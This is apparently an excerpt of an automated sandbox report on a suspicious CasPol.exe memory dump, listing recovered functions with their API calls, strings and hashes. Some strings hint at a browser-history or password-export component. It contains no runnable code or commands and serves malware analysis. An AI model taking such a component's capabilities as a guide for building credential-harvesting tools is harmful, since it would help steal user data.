                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                          • API String ID: 2000436516-3842416460
                                                                                                                                                                          • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                          • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                          • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                          • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                            • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                            • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                            • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                            • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                            • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                            • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                            • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                          • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                          • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1043902810-0
                                                                                                                                                                          • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                          • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                          • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                          • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                          • free.MSVCRT ref: 0040E49A
                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                          • memset.MSVCRT ref: 0040E380
                                                                                                                                                                            • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                            • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                          • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                          • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                          • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                          • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                          • API String ID: 3849927982-2252543386
                                                                                                                                                                          • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                          • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                          • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                                          • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                          APIs
                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                          • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                          • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                          • API String ID: 2899246560-1542517562
                                                                                                                                                                          • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                          • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                          • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                          • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004091E2
                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                          • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                          • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                          • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                          • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                          • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                          • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                          • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                          • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 3715365532-3916222277
                                                                                                                                                                          • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                          • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                          • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                          • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                          • memset.MSVCRT ref: 004085CF
                                                                                                                                                                          • memset.MSVCRT ref: 004085F1
                                                                                                                                                                          • memset.MSVCRT ref: 00408606
                                                                                                                                                                          • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                                          • memset.MSVCRT ref: 0040870E
                                                                                                                                                                          • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 004087A6
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                          • String ID: ---
                                                                                                                                                                          • API String ID: 3437578500-2854292027
                                                                                                                                                                          • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                          • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                          • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                          • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                          • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                          • free.MSVCRT ref: 004186C7
                                                                                                                                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                          • free.MSVCRT ref: 004186E0
                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                          • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                          • free.MSVCRT ref: 00418716
                                                                                                                                                                          • free.MSVCRT ref: 0041872A
                                                                                                                                                                          • free.MSVCRT ref: 00418749
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                                          • String ID: |A
                                                                                                                                                                          • API String ID: 3356672799-1717621600
                                                                                                                                                                          • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                          • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                          • API String ID: 2081463915-1959339147
                                                                                                                                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                          • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1700100422-0
                                                                                                                                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 552707033-0
                                                                                                                                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C0A4
                                                                                                                                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                          • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                          • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                          • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                          • String ID: 4$h
                                                                                                                                                                          • API String ID: 4066021378-1856150674
                                                                                                                                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$_snwprintf
                                                                                                                                                                          • String ID: %%0.%df
                                                                                                                                                                          • API String ID: 3473751417-763548558
                                                                                                                                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                                                                                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                                                                                                                          APIs
                                                                                                                                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                          • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                          • String ID: A
                                                                                                                                                                          • API String ID: 2892645895-3554254475
                                                                                                                                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                                                                                                                          • String ID: 0$6
                                                                                                                                                                          • API String ID: 4066108131-3849865405
                                                                                                                                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                                                                                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                                                                                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                                                                                                                          APIs
                                                                                                                                                                          • memset.MSVCRT ref: 004082EF
                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                          • memset.MSVCRT ref: 00408362
                                                                                                                                                                          • memset.MSVCRT ref: 00408377
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000016.00000002.531238824.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_22_2_400000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: memset$ByteCharMultiWide
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 290601579-0
                                                                                                                                                                          • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                          • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
